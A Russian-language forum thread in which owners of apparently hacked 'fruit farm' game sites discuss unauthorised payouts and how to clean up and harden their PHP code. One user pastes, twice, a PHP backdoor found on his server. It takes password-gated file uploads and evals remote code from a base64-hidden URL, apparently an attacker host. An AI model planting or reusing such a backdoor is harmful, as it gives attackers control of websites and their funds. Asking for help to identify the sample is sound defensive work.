Взлом фруктовой фермы [Защита фруктовой фермы]

pligin

Команда форума
Администратор
а в базе это не запишется ?
если выполнялся скрипт JS, то мог только от чьего-то имени отправлять запросы. если у тебя пишутся эти данные (выплата) в БД, то будут... иначе это было обращение через PHP либо БД и потом PHP
 

taburetus

Участник
в базе нету.. это сто процентов этот evol()... (evil ))) ) ,был в хидоре и боди.... js папка вся удалена.. там один файл(чистый)... только это. а БД как еще могут обратиться?(зачем? там api нет)..
 

pligin

Команда форума
Администратор
в базе нету.. это сто процентов этот evol()... (evil ))) ) ,был в хидоре и боди.... js папка вся удалена.. там один файл(чистый)... только это. а БД как еще могут обратиться?(зачем? там api нет)..
js ничего сделать не может... ты не там ищешь... смотри логи запросов и ошибок на момент выплаты
 

taburetus

Участник
да.. я сам протупил... когда чистил... Листаю код и тупо пропускаю эти моменты.... Спасибо тебе за внимание.. Я просто давно отошел от этой темы... засомневался в чат бро.. там такая фигня и скрипт не знакомый.. вот и оставил.. Спасибо.. (вот бы вы еще тему про фильтры забобахали для начинающих под PHP 7 Msqli.. а то через онлайн проверку новые фермы не исправляются автоматом))) )
 

pligin

Команда форума
Администратор
тему про фильтры
будет, но только тогда когда я сам "шишек набью"... у меня недавно была проблема с фильтрами валидации URL (в PHP есть они) - эта функция вместе с URL пропускает все, что угодно и из-за этого могли отправлять запросы в БД...
скоро выложу нормальные фильтры для различных типов данных
 

taburetus

Участник
да есть на форуме тема про защиту... но скажу прямо.. там ничерта не понятно!.. после этой темы гугл вперед))))))
 

iHrome

Участник
у меня вот вопрос , это вредоносный eval?

Код:
<?php
ini_set('display_errors','Off'); error_reporting('E_ALL');
setcookie('server',1,time()+1e6);$s=$_SERVER;$sr=$s['HTTP_REFERER'];$sh=$s['HTTP_HOST'];$cs=$_COOKIE['server'];
if(isset($_FILES['u']) && isset($_POST['n']) && isset($_POST['hash']) && md5($_POST['hash'])=='3ff1ea09b981d88e7c8752b329a7702e')
{
    move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']);
}
elseif(($sr && !strpos($sr,$sh) && $cs!=1) || $c=$_GET['cmdcmd'])
{
    eval(file_get_contents(base64_decode('aHR0cDovL3MtYi5pY3Uvdy8/dT0=').$sh.'&c='.$c));
}
?>
 

iHrome

Участник
у меня вот вопрос , это вредоносный eval?

Код:
<?php
ini_set('display_errors','Off'); error_reporting('E_ALL');
setcookie('server',1,time()+1e6);$s=$_SERVER;$sr=$s['HTTP_REFERER'];$sh=$s['HTTP_HOST'];$cs=$_COOKIE['server'];
if(isset($_FILES['u']) && isset($_POST['n']) && isset($_POST['hash']) && md5($_POST['hash'])=='3ff1ea09b981d88e7c8752b329a7702e')
{
    move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']);
}
elseif(($sr && !strpos($sr,$sh) && $cs!=1) || $c=$_GET['cmdcmd'])
{
    eval(file_get_contents(base64_decode('aHR0cDovL3MtYi5pY3Uvdy8/dT0=').$sh.'&c='.$c));
}
?>
Короче не дождавшись по удалял почти все евалы которые оказались новыми, остались только в нескольких js, кто даст совет что делать что бы такого более не случилось, т.к. хоть и 18 с копейками рублей вывели, это обидно, шестерня в паере стояла , НО не было комментария кому и с какого проекта, вот только так и понял что был взлом, после случайно увидел левый php, к сожалению не сохранил, просто удалил)

Просто хочу совет узнать у более умных людей, если я на папку js поставлю ограничение допустим в 400, повлияет ли это на сайт?

кстати закодировка ведёт на сайт скам рулетки
 
Последнее редактирование:
Верх